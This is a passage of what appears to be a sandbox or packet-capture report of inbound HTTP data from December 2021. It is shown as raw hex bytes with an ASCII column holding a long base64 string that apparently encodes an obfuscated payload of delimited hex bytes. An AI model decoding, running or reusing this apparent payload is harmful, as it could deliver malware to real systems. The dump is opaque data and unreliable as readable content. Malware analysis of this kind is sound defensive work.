52 53 78 67 52 54 63 73 59 45 4a 47 4c 47 42 46 51 79 78 67 4e 45 59 73 59 44 52 46 4c 47 41 30 52 69 78 67 4e 7a 59 73 59 44 64 46 4c 47 42 42 51 69 78 67 52 44 59 73 59 44 Data Ascii: 4LGBGMixgQTEsYDk4LGBFNSxgQjYsYENGLGAzQSxgNkYsYDNDLGBDNCxgMUIsYEJGLGBFMSxgQUYsYEZDLGA5NSxgOUYsYEE0LGBGRixgRUUsYEJGLGA3RCxgMTQsYEFDLGAzNSxgOUEsYEJDLGBERSxgRUIsYENFLGAxQixgQkYsYDNFLGBERSxgRjgsYDNELGBGRSxgRTcsYEJGLGBFQyxgNEYsYDRFLGA0RixgNzYsYDdFLGBBQixgRDYsYD
2021-12-02 17:26:37 UTC	304	IN	Data Raw: 44 4c 47 42 46 52 69 78 67 52 6b 55 73 59 44 67 33 4c 47 42 47 52 43 78 67 51 30 55 73 59 44 41 32 4c 47 42 45 4e 69 78 67 4f 54 49 73 59 45 5a 47 4c 47 42 46 4d 79 78 67 4e 45 55 73 59 44 55 33 4c 47 42 43 52 69 78 67 4d 55 49 73 59 45 4a 42 4c 47 42 47 51 53 78 67 4f 55 59 73 59 45 4d 7a 4c 47 42 42 52 53 78 67 51 6b 55 73 59 44 6b 7a 4c 47 42 45 4e 69 78 67 4e 55 49 73 59 45 5a 47 4c 47 41 35 4d 53 78 67 51 7a 59 73 59 44 4a 45 4c 47 41 79 52 53 78 67 4d 55 51 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4d 6a 4d 73 59 45 4a 43 4c 47 42 47 51 53 78 67 4e 6a 63 73 59 45 46 45 4c 47 41 33 52 53 78 67 52 55 51 73 59 45 4a 47 4c 47 41 7a 4e 43 78 67 4e 30 51 73 59 45 59 33 4c 47 41 78 4e 79 78 67 52 6b 51 73 59 44 49 7a 4c 47 42 47 52 69 78 67 4f 54 67 73 59 45 Data Ascii: DLGBFRixgRkUsYDg3LGBGRCxgQ0UsYDA2LGBENixgOTIsYEZGLGBFMyxgNEUsYDU3LGBCRixgMUIsYEJBLGBGQSxgOUYsYEMzLGBBRSxgQkUsYDkzLGBENixgNUIsYEZGLGA5MSxgQzYsYDJELGAyRSxgMUQsYEZFLGBCRixgMjMsYEJCLGBGQSxgNjcsYEFELGA3RSxgRUQsYEJGLGAzNCxgN0QsYEY3LGAxNyxgRkQsYDIzLGBGRixgOTgsYE
2021-12-02 17:26:37 UTC	320	IN	Data Raw: 44 4c 47 41 7a 4f 53 78 67 4e 7a 67 73 59 45 55 33 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 45 4e 43 4c 47 41 33 52 53 78 67 51 30 49 73 59 44 4e 47 4c 47 41 79 4e 69 78 67 52 6b 51 73 59 45 49 78 4c 47 42 47 52 69 78 67 52 6a 49 73 59 44 4e 47 4c 47 42 47 51 69 78 67 52 44 63 73 59 45 5a 45 4c 47 41 33 4e 79 78 67 52 45 4d 73 59 44 52 42 4c 47 42 46 51 53 78 67 4d 30 59 73 59 45 52 46 4c 47 41 33 4f 53 78 67 52 54 63 73 59 44 46 44 4c 47 42 46 52 69 78 67 4e 30 4d 73 59 45 59 78 4c 47 41 35 4e 79 78 67 52 6b 59 73 59 45 55 35 4c 47 42 47 52 69 78 67 4e 45 45 73 59 45 5a 42 4c 47 41 33 4e 79 78 67 4e 30 59 73 59 45 59 32 4c 47 41 31 4e 79 78 67 52 6b 55 73 59 45 4d 32 4c 47 42 47 52 53 78 67 4d 30 49 73 59 45 4d 78 4c 47 41 31 4d 69 78 67 52 6b 51 73 59 45 Data Ascii: DLGAzOSxgNzgsYEU3LGA3RixgRjksYENCLGA3RSxgQ0IsYDNGLGAyNixgRkQsYEIxLGBGRixgRjIsYDNGLGBGQixgRDcsYEZELGA3NyxgREMsYDRBLGBFQSxgM0YsYERFLGA3OSxgRTcsYDFDLGBFRixgN0MsYEYxLGA5NyxgRkYsYEU5LGBGRixgNEEsYEZBLGA3NyxgN0YsYEY2LGA1NyxgRkUsYEM2LGBGRSxgM0IsYEMxLGA1MixgRkQsYE
2021-12-02 17:26:37 UTC	336	IN	Data Raw: 47 4c 47 42 46 4f 43 78 67 51 54 55 73 59 45 4a 47 4c 47 41 34 4d 69 78 67 4e 30 55 73 59 45 52 47 4c 47 42 42 4d 53 78 67 4f 55 59 73 59 45 4a 47 4c 47 41 79 52 69 78 67 51 6b 51 73 59 45 59 33 4c 47 41 30 4e 79 78 67 52 44 49 73 59 44 59 33 4c 47 42 47 52 69 78 67 4d 7a 59 73 59 45 4d 78 4c 47 42 47 51 79 78 67 4e 6b 51 73 59 45 45 34 4c 47 42 47 52 43 78 67 52 55 59 73 59 44 51 79 4c 47 42 43 4d 43 78 67 4e 30 55 73 59 44 49 31 4c 47 42 46 4d 53 78 67 52 6a 45 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4d 30 45 73 59 45 4a 47 4c 47 42 44 4e 69 78 67 51 55 59 73 59 45 59 78 4c 47 42 42 51 69 78 67 52 54 67 73 59 44 6c 45 4c 47 41 33 52 69 78 67 4f 44 67 73 59 45 4a 46 4c 47 42 47 52 69 78 67 51 6a 4d 73 59 45 55 34 4c 47 42 46 52 69 78 67 52 6b 59 73 59 44 Data Ascii: GLGBFOCxgQTUsYEJGLGA4MixgN0UsYERGLGBBMSxgOUYsYEJGLGAyRixgQkQsYEY3LGA0NyxgRDIsYDY3LGBGRixgMzYsYEMxLGBGQyxgNkQsYEE4LGBGRCxgRUYsYDQyLGBCMCxgN0UsYDI1LGBFMSxgRjEsYDlCLGBGRixgM0EsYEJGLGBDNixgQUYsYEYxLGBBQixgRTgsYDlELGA3RixgODgsYEJFLGBGRixgQjMsYEU4LGBFRixgRkYsYD
2021-12-02 17:26:37 UTC	352	IN	Data Raw: 30 4c 47 41 30 4e 79 78 67 52 6b 49 73 59 44 63 33 4c 47 41 33 4e 79 78 67 51 7a 59 73 59 45 59 79 4c 47 42 42 4e 79 78 67 52 54 41 73 59 45 55 31 4c 47 41 31 52 69 78 67 4d 7a 6b 73 59 45 5a 47 4c 47 42 46 4e 79 78 67 52 6b 55 73 59 45 52 46 4c 47 42 47 4e 43 78 67 4d 6b 59 73 59 45 59 35 4c 47 41 32 52 43 78 67 4e 30 59 73 59 44 6c 45 4c 47 41 34 4d 43 78 67 4e 44 63 73 59 44 41 32 4c 47 41 33 51 79 78 67 51 54 55 73 59 44 64 47 4c 47 42 43 4d 53 78 67 4d 44 4d 73 59 45 55 77 4c 47 41 79 4e 79 78 67 4d 44 41 73 59 45 55 77 4c 47 42 45 52 69 78 67 52 6b 45 73 59 44 6c 45 4c 47 41 35 4e 79 78 67 51 6b 59 73 59 44 63 7a 4c 47 42 47 51 53 78 67 52 6b 45 73 59 45 51 33 4c 47 42 47 4f 43 78 67 4e 6b 45 73 59 45 49 79 4c 47 42 44 4f 53 78 67 51 6a 59 73 59 45 Data Ascii: 0LGA0NyxgRkIsYDc3LGA3NyxgQzYsYEYyLGBBNyxgRTAsYEU1LGA1RixgMzksYEZGLGBFNyxgRkUsYERFLGBGNCxgMkYsYEY5LGA2RCxgN0YsYDlELGA4MCxgNDcsYDA2LGA3QyxgQTUsYDdGLGBCMSxgMDMsYEUwLGAyNyxgMDAsYEUwLGBERixgRkEsYDlELGA5NyxgQkYsYDczLGBGQSxgRkEsYEQ3LGBGOCxgNkEsYEIyLGBDOSxgQjYsYE
2021-12-02 17:26:37 UTC	368	IN	Data Raw: 47 4c 47 42 46 4f 43 78 67 51 6b 59 73 59 45 5a 47 4c 47 41 31 4e 79 78 67 52 6b 4d 73 59 44 63 33 4c 47 42 42 4d 69 78 67 4f 44 6b 73 59 45 56 47 4c 47 42 45 52 69 78 67 52 6a 67 73 59 44 4a 47 4c 47 41 77 4f 53 78 67 4e 55 59 73 59 44 56 47 4c 47 41 79 4d 53 78 67 4e 54 51 73 59 45 4d 31 4c 47 41 78 4d 69 78 67 51 7a 63 73 59 45 59 35 4c 47 42 45 52 69 78 67 52 6a 55 73 59 45 4a 43 4c 47 42 47 52 43 78 67 52 6b 45 73 59 44 59 77 4c 47 42 42 4d 69 78 67 51 30 59 73 59 45 4a 47 4c 47 42 47 51 79 78 67 4d 55 49 73 59 44 64 47 4c 47 42 45 4d 43 78 67 4e 6a 45 73 59 45 45 79 4c 47 42 45 52 69 78 67 4d 55 51 73 59 45 56 47 4c 47 41 33 4e 43 78 67 4f 54 67 73 59 45 55 34 4c 47 41 77 4d 69 78 67 4f 55 59 73 59 45 59 31 4c 47 41 35 4f 53 78 67 52 54 67 73 59 44 Data Ascii: GLGBFOCxgQkYsYEZGLGA1NyxgRkMsYDc3LGBBMixgODksYEVGLGBERixgRjgsYDJGLGAwOSxgNUYsYDVGLGAyMSxgNTQsYEM1LGAxMixgQzcsYEY5LGBERixgRjUsYEJCLGBGRCxgRkEsYDYwLGBBMixgQ0YsYEJGLGBGQyxgMUIsYDdGLGBEMCxgNjEsYEEyLGBERixgMUQsYEVGLGA3NCxgOTgsYEU4LGAwMixgOUYsYEY1LGA5OSxgRTgsYD
2021-12-02 17:26:37 UTC	384	IN	Data Raw: 78 4c 47 41 77 52 69 78 67 51 30 51 73 59 44 59 32 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 4e 42 4c 47 41 78 52 69 78 67 4e 6a 4d 73 59 45 49 7a 4c 47 41 30 52 69 78 67 52 44 6b 73 59 45 5a 43 4c 47 41 7a 52 69 78 67 51 6a 63 73 59 45 59 7a 4c 47 42 47 4d 69 78 67 4d 30 59 73 59 44 67 31 4c 47 42 42 51 79 78 67 52 54 67 73 59 45 4a 47 4c 47 42 47 4e 69 78 67 4e 6b 59 73 59 45 5a 45 4c 47 41 33 4d 79 78 67 4e 30 59 73 59 44 55 31 4c 47 42 47 51 53 78 67 4e 6a 63 73 59 45 5a 46 4c 47 42 47 4e 69 78 67 4d 30 59 73 59 45 59 7a 4c 47 42 43 4d 53 78 67 52 6b 59 73 59 44 4d 79 4c 47 41 34 4d 69 78 67 4f 54 6b 73 59 45 4d 7a 4c 47 41 31 52 69 78 67 52 6b 55 73 59 44 5a 43 4c 47 42 47 4d 53 78 67 4f 45 49 73 59 44 45 30 4c 47 42 44 52 69 78 67 52 6b 4d 73 59 44 Data Ascii: xLGAwRixgQ0QsYDY2LGBFRixgRkYsYENBLGAxRixgNjMsYEIzLGA0RixgRDksYEZCLGAzRixgQjcsYEYzLGBGMixgM0YsYDg1LGBBQyxgRTgsYEJGLGBGNixgNkYsYEZELGA3MyxgN0YsYDU1LGBGQSxgNjcsYEZFLGBGNixgM0YsYEYzLGBCMSxgRkYsYDMyLGA4MixgOTksYEMzLGA1RixgRkUsYDZCLGBGMSxgOEIsYDE0LGBDRixgRkMsYD
2021-12-02 17:26:37 UTC	400	IN	Data Raw: 31 4c 47 41 32 4d 79 78 67 52 6a 6b 73 59 44 63 35 4c 47 42 47 51 53 78 67 52 45 59 73 59 45 5a 44 4c 47 42 47 4f 53 78 67 52 6b 49 73 59 45 5a 47 4c 47 41 32 4d 53 78 67 52 6b 45 73 59 44 51 33 4c 47 42 47 52 69 78 67 4e 6a 45 73 59 44 4a 47 4c 47 42 47 52 69 78 67 51 7a 41 73 59 45 52 47 4c 47 42 47 51 69 78 67 52 6a 63 73 59 44 4d 35 4c 47 41 7a 4e 79 78 67 4e 6b 49 73 59 44 4a 42 4c 47 41 33 52 69 78 67 4e 7a 41 73 59 44 41 33 4c 47 42 44 4e 43 78 67 4d 30 59 73 59 44 52 47 4c 47 42 45 4f 53 78 67 51 7a 63 73 59 45 5a 42 4c 47 42 44 52 69 78 67 4d 45 4d 73 59 45 55 35 4c 47 41 33 4d 43 78 67 4f 55 4d 73 59 45 5a 46 4c 47 42 42 4f 53 78 67 51 7a 55 73 59 44 5a 47 4c 47 42 47 4e 69 78 67 4f 44 63 73 59 44 63 32 4c 47 41 35 4d 79 78 67 51 55 4d 73 59 44 Data Ascii: 1LGA2MyxgRjksYDc5LGBGQSxgREYsYEZDLGBGOSxgRkIsYEZGLGA2MSxgRkEsYDQ3LGBGRixgNjEsYDJGLGBGRixgQzAsYERGLGBGQixgRjcsYDM5LGAzNyxgNkIsYDJBLGA3RixgNzAsYDA3LGBDNCxgM0YsYDRGLGBEOSxgQzcsYEZBLGBDRixgMEMsYEU5LGA3MCxgOUMsYEZFLGBBOSxgQzUsYDZGLGBGNixgODcsYDc2LGA5MyxgQUMsYD
2021-12-02 17:26:37 UTC	416	IN	Data Raw: 30 4c 47 42 47 52 43 78 67 52 55 51 73 59 44 64 47 4c 47 42 44 52 69 78 67 4d 30 59 73 59 44 4d 32 4c 47 42 46 4d 43 78 67 51 30 55 73 59 44 67 78 4c 47 41 78 51 79 78 67 52 45 55 73 59 44 59 33 4c 47 41 78 52 43 78 67 4f 44 51 73 59 45 5a 46 4c 47 41 32 4d 69 78 67 4d 44 41 73 59 45 59 34 4c 47 41 35 52 43 78 67 52 6b 55 73 59 44 68 42 4c 47 41 7a 52 69 78 67 52 6a 51 73 59 44 5a 47 4c 47 41 30 4f 53 78 67 4f 45 59 73 59 45 5a 46 4c 47 41 35 4f 43 78 67 4f 44 55 73 59 45 45 33 4c 47 41 33 52 43 78 67 4f 44 59 73 59 45 51 32 4c 47 41 34 4f 53 78 67 51 6b 55 73 59 45 56 42 4c 47 42 43 51 79 78 67 4f 55 59 73 59 45 55 78 4c 47 42 47 52 43 78 67 4d 30 59 73 59 45 55 35 4c 47 42 45 4e 53 78 67 4e 55 59 73 59 45 5a 44 4c 47 41 7a 4d 69 78 67 52 6b 51 73 59 44 Data Ascii: 0LGBGRCxgRUQsYDdGLGBDRixgM0YsYDM2LGBFMCxgQ0UsYDgxLGAxQyxgREUsYDY3LGAxRCxgODQsYEZFLGA2MixgMDAsYEY4LGA5RCxgRkUsYDhBLGAzRixgRjQsYDZGLGA0OSxgOEYsYEZFLGA5OCxgODUsYEE3LGA3RCxgODYsYEQ2LGA4OSxgQkUsYEVBLGBCQyxgOUYsYEUxLGBGRCxgM0YsYEU5LGBENSxgNUYsYEZDLGAzMixgRkQsYD
2021-12-02 17:26:37 UTC	432	IN	Data Raw: 44 4c 47 42 47 51 79 78 67 51 54 63 73 59 44 64 47 4c 47 42 42 4d 79 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 4d 54 67 73 59 45 51 78 4c 47 42 47 52 69 78 67 51 6b 59 73 59 45 59 31 4c 47 41 31 51 69 78 67 52 44 49 73 59 45 56 47 4c 47 41 78 4e 43 78 67 51 7a 59 73 59 44 64 45 4c 47 41 35 51 69 78 67 4e 7a 49 73 59 44 52 46 4c 47 41 33 4d 79 78 67 52 54 51 73 59 44 45 33 4c 47 42 46 4f 53 78 67 52 6a 63 73 59 45 4a 47 4c 47 41 34 4f 53 78 67 52 6a 49 73 59 44 6b 78 4c 47 42 47 52 69 78 67 4d 6a 63 73 59 45 55 31 4c 47 41 78 4e 79 78 67 52 6b 59 73 59 45 55 30 4c 47 41 31 52 69 78 67 52 6b 49 73 59 45 51 33 4c 47 42 47 4f 43 78 67 4d 7a 55 73 59 45 5a 46 4c 47 41 33 52 53 78 67 4f 44 49 73 59 45 59 7a 4c 47 42 47 51 69 78 67 4e 54 45 73 59 44 Data Ascii: DLGBGQyxgQTcsYDdGLGBBMyxgNUYsYEUzLGBENyxgMTgsYEQxLGBGRixgQkYsYEY1LGA1QixgRDIsYEVGLGAxNCxgQzYsYDdELGA5QixgNzIsYDRFLGA3MyxgRTQsYDE3LGBFOSxgRjcsYEJGLGA4OSxgRjIsYDkxLGBGRixgMjcsYEU1LGAxNyxgRkYsYEU0LGA1RixgRkIsYEQ3LGBGOCxgMzUsYEZFLGA3RSxgODIsYEYzLGBGQixgNTEsYD
2021-12-02 17:26:37 UTC	448	IN	Data Raw: 45 4c 47 41 78 4e 79 78 67 52 6b 55 73 59 45 4d 33 4c 47 41 33 52 69 78 67 4e 6a 67 73 59 45 51 30 4c 47 41 77 52 53 78 67 4d 30 4d 73 59 45 59 35 4c 47 41 34 52 43 78 67 4d 7a 6b 73 59 45 4a 43 4c 47 41 30 4f 43 78 67 4e 7a 59 73 59 45 55 77 4c 47 41 35 4d 79 78 67 4d 45 55 73 59 45 51 34 4c 47 41 7a 4f 53 78 67 4e 54 49 73 59 45 45 30 4c 47 41 79 4e 79 78 67 51 7a 45 73 59 44 67 33 4c 47 41 78 4e 43 78 67 51 54 49 73 59 44 46 45 4c 47 42 47 52 43 78 67 52 55 55 73 59 44 6c 47 4c 47 42 47 52 53 78 67 52 6a 4d 73 59 45 52 45 4c 47 41 78 4d 43 78 67 52 55 51 73 59 44 41 34 4c 47 42 45 52 43 78 67 52 6b 4d 73 59 45 4a 45 4c 47 42 47 52 69 78 67 52 6b 49 73 59 45 55 79 4c 47 41 31 52 53 78 67 4d 30 45 73 59 45 5a 43 4c 47 41 32 4e 53 78 67 4f 45 59 73 59 45 Data Ascii: ELGAxNyxgRkUsYEM3LGA3RixgNjgsYEQ0LGAwRSxgM0MsYEY5LGA4RCxgMzksYEJCLGA0OCxgNzYsYEUwLGA5MyxgMEUsYEQ4LGAzOSxgNTIsYEE0LGAyNyxgQzEsYDg3LGAxNCxgQTIsYDFELGBGRCxgRUUsYDlGLGBGRSxgRjMsYERELGAxMCxgRUQsYDA4LGBERCxgRkMsYEJELGBGRixgRkIsYEUyLGA1RSxgM0EsYEZCLGA2NSxgOEYsYE
2021-12-02 17:26:37 UTC	464	IN	Data Raw: 47 4c 47 42 42 4e 79 78 67 51 54 63 73 59 44 4d 35 4c 47 41 77 4d 43 78 67 52 6b 4d 73 59 44 63 78 4c 47 41 31 52 69 78 67 52 6b 51 73 59 44 46 43 4c 47 42 47 52 69 78 67 4e 54 41 73 59 45 5a 42 4c 47 42 46 4d 79 78 67 51 6b 59 73 59 45 51 35 4c 47 42 46 52 69 78 67 52 6b 55 73 59 45 52 47 4c 47 42 47 4f 53 78 67 4d 44 41 73 59 44 41 32 4c 47 41 35 51 79 78 67 51 55 45 73 59 44 64 47 4c 47 42 43 4e 53 78 67 4d 44 4d 73 59 45 55 77 4c 47 41 32 4d 79 78 67 4d 44 41 73 59 45 59 34 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 51 30 4c 47 42 43 52 69 78 67 52 6b 59 73 59 44 4e 47 4c 47 41 30 4f 53 78 67 4e 55 59 73 59 44 4e 46 4c 47 42 43 52 69 78 67 52 6a 4d 73 59 45 4d 30 4c 47 41 77 4e 79 78 67 4d 54 41 73 59 45 59 7a 4c 47 41 78 4d 43 78 67 52 6b 55 73 59 45 Data Ascii: GLGBBNyxgQTcsYDM5LGAwMCxgRkMsYDcxLGA1RixgRkQsYDFCLGBGRixgNTAsYEZBLGBFMyxgQkYsYEQ5LGBFRixgRkUsYERGLGBGOSxgMDAsYDA2LGA5QyxgQUEsYDdGLGBCNSxgMDMsYEUwLGA2MyxgMDAsYEY4LGA5QixgRkUsYEQ0LGBCRixgRkYsYDNGLGA0OSxgNUYsYDNFLGBCRixgRjMsYEM0LGAwNyxgMTAsYEYzLGAxMCxgRkUsYE
2021-12-02 17:26:37 UTC	480	IN	Data Raw: 44 4c 47 41 33 4e 79 78 67 51 7a 41 73 59 45 5a 46 4c 47 41 33 4d 69 78 67 52 54 51 73 59 45 56 47 4c 47 42 46 51 69 78 67 4d 30 59 73 59 45 59 78 4c 47 42 44 4e 79 78 67 51 6b 59 73 59 44 6b 31 4c 47 41 7a 52 53 78 67 52 6b 4d 73 59 45 49 33 4c 47 42 46 52 69 78 67 4e 30 45 73 59 45 51 78 4c 47 42 44 51 53 78 67 52 55 59 73 59 45 5a 45 4c 47 41 31 51 69 78 67 4e 55 55 73 59 45 5a 47 4c 47 41 30 51 69 78 67 4f 45 59 73 59 44 41 77 4c 47 42 45 4e 69 78 67 4e 45 49 73 59 45 59 30 4c 47 42 42 4e 69 78 67 52 6b 59 73 59 45 55 35 4c 47 42 43 4e 79 78 67 4e 30 59 73 59 44 4a 45 4c 47 41 77 52 69 78 67 52 55 4d 73 59 45 4a 47 4c 47 42 43 4d 53 78 67 4d 7a 55 73 59 44 45 78 4c 47 42 43 4d 43 78 67 52 44 63 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 52 6b 59 73 59 45 Data Ascii: DLGA3NyxgQzAsYEZFLGA3MixgRTQsYEVGLGBFQixgM0YsYEYxLGBDNyxgQkYsYDk1LGAzRSxgRkMsYEI3LGBFRixgN0EsYEQxLGBDQSxgRUYsYEZELGA1QixgNUUsYEZGLGA0QixgOEYsYDAwLGBENixgNEIsYEY0LGBBNixgRkYsYEU5LGBCNyxgN0YsYDJELGAwRixgRUMsYEJGLGBCMSxgMzUsYDExLGBCMCxgRDcsYDNGLGA1NSxgRkYsYE
2021-12-02 17:26:37 UTC	496	IN	Data Raw: 77 4c 47 41 78 52 69 78 67 52 6b 4d 73 59 44 55 30 4c 47 41 33 52 43 78 67 52 44 59 73 59 44 41 78 4c 47 42 47 51 69 78 67 4d 54 63 73 59 44 41 77 4c 47 42 46 51 79 78 67 51 6b 49 73 59 45 46 45 4c 47 41 7a 52 69 78 67 52 6b 59 73 59 44 5a 47 4c 47 41 30 52 69 78 67 52 6b 59 73 59 45 46 44 4c 47 41 33 4e 79 78 67 52 6b 59 73 59 45 52 44 4c 47 42 43 52 69 78 67 52 54 45 73 59 44 67 7a 4c 47 42 47 52 43 78 67 51 7a 6b 73 59 45 59 30 4c 47 42 43 4d 79 78 67 4e 55 59 73 59 45 5a 46 4c 47 42 43 52 69 78 67 52 6b 51 73 59 45 52 47 4c 47 42 43 52 69 78 67 52 54 55 73 59 44 4a 47 4c 47 42 42 4d 43 78 67 52 6a 63 73 59 44 64 46 4c 47 41 35 4d 69 78 67 4e 45 4d 73 59 44 52 43 4c 47 42 46 4e 79 78 67 51 6b 51 73 59 44 63 7a 4c 47 42 43 51 79 78 67 52 6a 63 73 59 45 Data Ascii: wLGAxRixgRkMsYDU0LGA3RCxgRDYsYDAxLGBGQixgMTcsYDAwLGBFQyxgQkIsYEFELGAzRixgRkYsYDZGLGA0RixgRkYsYEFDLGA3NyxgRkYsYERDLGBCRixgRTEsYDgzLGBGRCxgQzksYEY0LGBCMyxgNUYsYEZFLGBCRixgRkQsYERGLGBCRixgRTUsYDJGLGBBMCxgRjcsYDdFLGA5MixgNEMsYDRCLGBFNyxgQkQsYDczLGBCQyxgRjcsYE
2021-12-02 17:26:37 UTC	512	IN	Data Raw: 32 4c 47 41 77 4d 43 78 67 52 6b 49 73 59 45 51 7a 4c 47 41 32 4e 79 78 67 51 7a 63 73 59 44 64 47 4c 47 41 30 4f 43 78 67 51 6b 45 73 59 45 5a 47 4c 47 41 79 51 69 78 67 52 6a 63 73 59 44 64 46 4c 47 41 77 4e 79 78 67 4d 55 59 73 59 45 56 44 4c 47 42 46 52 69 78 67 52 6a 45 73 59 44 4a 47 4c 47 41 35 52 43 78 67 4d 44 4d 73 59 45 56 44 4c 47 42 42 52 69 78 67 52 54 63 73 59 44 68 45 4c 47 42 47 4d 69 78 67 4d 55 59 73 59 45 59 35 4c 47 41 34 51 69 78 67 4e 44 49 73 59 44 4d 78 4c 47 42 45 4e 79 78 67 4e 54 45 73 59 45 51 79 4c 47 42 46 51 53 78 67 52 44 41 73 59 44 4e 47 4c 47 42 45 51 69 78 67 4d 44 45 73 59 45 5a 43 4c 47 42 47 4e 79 78 67 52 6b 51 73 59 44 4d 79 4c 47 41 77 4d 69 78 67 52 6b 49 73 59 44 41 33 4c 47 41 31 51 79 78 67 52 6b 59 73 59 45 Data Ascii: 2LGAwMCxgRkIsYEQzLGA2NyxgQzcsYDdGLGA0OCxgQkEsYEZGLGAyQixgRjcsYDdFLGAwNyxgMUYsYEVDLGBFRixgRjEsYDJGLGA5RCxgMDMsYEVDLGBBRixgRTcsYDhELGBGMixgMUYsYEY5LGA4QixgNDIsYDMxLGBENyxgNTEsYEQyLGBFQSxgRDAsYDNGLGBEQixgMDEsYEZCLGBGNyxgRkQsYDMyLGAwMixgRkIsYDA3LGA1QyxgRkYsYE
2021-12-02 17:26:37 UTC	528	IN	Data Raw: 47 4c 47 41 7a 4f 53 78 67 4d 7a 51 73 59 44 51 35 4c 47 41 30 51 53 78 67 51 6b 49 73 59 44 4e 47 4c 47 41 34 4f 43 78 67 4d 44 51 73 59 45 46 43 4c 47 41 77 4d 79 78 67 52 6a 55 73 59 44 49 7a 4c 47 41 30 4d 43 78 67 52 6b 51 73 59 45 59 31 4c 47 41 33 52 53 78 67 52 6a 6b 73 59 44 56 47 4c 47 42 47 51 79 78 67 4f 54 63 73 59 45 45 33 4c 47 42 42 4e 79 78 67 4e 30 59 73 59 45 5a 45 4c 47 42 42 52 69 78 67 52 6a 6b 73 59 45 56 47 4c 47 42 47 4f 43 78 67 4e 54 41 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4f 54 63 73 59 45 5a 46 4c 47 41 32 4d 69 78 67 4d 6a 41 73 59 45 5a 43 4c 47 42 43 4d 53 78 67 4d 7a 63 73 59 44 49 31 4c 47 41 33 52 69 78 67 52 6a 45 73 59 44 4e 47 4c 47 41 78 4f 43 78 67 52 54 59 73 59 45 4d 7a 4c 47 41 31 4e 43 78 67 4d 30 51 73 59 44 Data Ascii: GLGAzOSxgMzQsYDQ5LGA0QSxgQkIsYDNGLGA4OCxgMDQsYEFCLGAwMyxgRjUsYDIzLGA0MCxgRkQsYEY1LGA3RSxgRjksYDVGLGBGQyxgOTcsYEE3LGBBNyxgN0YsYEZELGBBRixgRjksYEVGLGBGOCxgNTAsYDNGLGBGRCxgOTcsYEZFLGA2MixgMjAsYEZCLGBCMSxgMzcsYDI1LGA3RixgRjEsYDNGLGAxOCxgRTYsYEMzLGA1NCxgM0QsYD
2021-12-02 17:26:37 UTC	544	IN	Data Raw: 45 4c 47 41 35 52 43 78 67 52 44 63 73 59 45 52 46 4c 47 42 46 4d 69 78 67 51 6a 55 73 59 45 52 47 4c 47 42 46 4e 79 78 67 52 6a 63 73 59 44 4d 34 4c 47 42 47 52 43 78 67 4d 6a 4d 73 59 45 51 7a 4c 47 42 45 52 69 78 67 52 54 49 73 59 44 63 33 4c 47 41 30 4f 43 78 67 4d 44 4d 73 59 44 51 32 4c 47 42 47 52 69 78 67 4e 30 51 73 59 45 5a 47 4c 47 42 42 4e 53 78 67 51 6b 59 73 59 44 45 33 4c 47 42 45 4f 43 78 67 52 6a 67 73 59 45 46 43 4c 47 41 7a 52 53 78 67 51 6b 59 73 59 45 4d 33 4c 47 41 33 52 69 78 67 4d 54 55 73 59 45 46 42 4c 47 41 35 52 43 78 67 4e 7a 4d 73 59 45 4d 78 4c 47 41 34 4e 69 78 67 4e 54 59 73 59 44 64 45 4c 47 42 47 52 53 78 67 52 6a 45 73 59 44 42 46 4c 47 42 45 4f 43 78 67 52 45 59 73 59 44 42 42 4c 47 41 32 4d 43 78 67 51 30 49 73 59 45 Data Ascii: ELGA5RCxgRDcsYERFLGBFMixgQjUsYERGLGBFNyxgRjcsYDM4LGBGRCxgMjMsYEQzLGBERixgRTIsYDc3LGA0OCxgMDMsYDQ2LGBGRixgN0QsYEZGLGBBNSxgQkYsYDE3LGBEOCxgRjgsYEFCLGAzRSxgQkYsYEM3LGA3RixgMTUsYEFBLGA5RCxgNzMsYEMxLGA4NixgNTYsYDdELGBGRSxgRjEsYDBFLGBEOCxgREYsYDBBLGA2MCxgQ0IsYE
2021-12-02 17:26:37 UTC	560	IN	Data Raw: 43 4c 47 42 47 52 53 78 67 4e 54 51 73 59 44 6b 32 4c 47 42 47 52 53 78 67 4d 55 51 73 59 44 56 47 4c 47 42 47 51 79 78 67 4f 44 59 73 59 44 64 47 4c 47 42 44 4d 43 78 67 52 55 59 73 59 44 4e 45 4c 47 42 44 51 79 78 67 4d 7a 59 73 59 44 64 47 4c 47 42 44 4e 43 78 67 51 55 59 73 59 44 49 78 4c 47 41 77 51 69 78 67 4e 7a 59 73 59 44 64 47 4c 47 41 78 4e 69 78 67 52 6a 55 73 59 45 5a 42 4c 47 42 43 4e 79 78 67 4d 6b 49 73 59 44 46 43 4c 47 41 78 52 43 78 67 52 6b 4d 73 59 44 52 45 4c 47 41 32 4d 43 78 67 4f 55 49 73 59 45 59 78 4c 47 41 7a 52 69 78 67 52 6a 63 73 59 44 51 33 4c 47 42 47 52 53 78 67 4d 45 55 73 59 45 55 35 4c 47 41 78 52 69 78 67 52 6b 4d 73 59 44 56 43 4c 47 42 47 52 69 78 67 4d 54 63 73 59 44 64 46 4c 47 41 31 4d 69 78 67 4e 44 55 73 59 45 Data Ascii: CLGBGRSxgNTQsYDk2LGBGRSxgMUQsYDVGLGBGQyxgODYsYDdGLGBDMCxgRUYsYDNELGBDQyxgMzYsYDdGLGBDNCxgQUYsYDIxLGAwQixgNzYsYDdGLGAxNixgRjUsYEZBLGBCNyxgMkIsYDFCLGAxRCxgRkMsYDRELGA2MCxgOUIsYEYxLGAzRixgRjcsYDQ3LGBGRSxgMEUsYEU5LGAxRixgRkMsYDVCLGBGRixgMTcsYDdFLGA1MixgNDUsYE
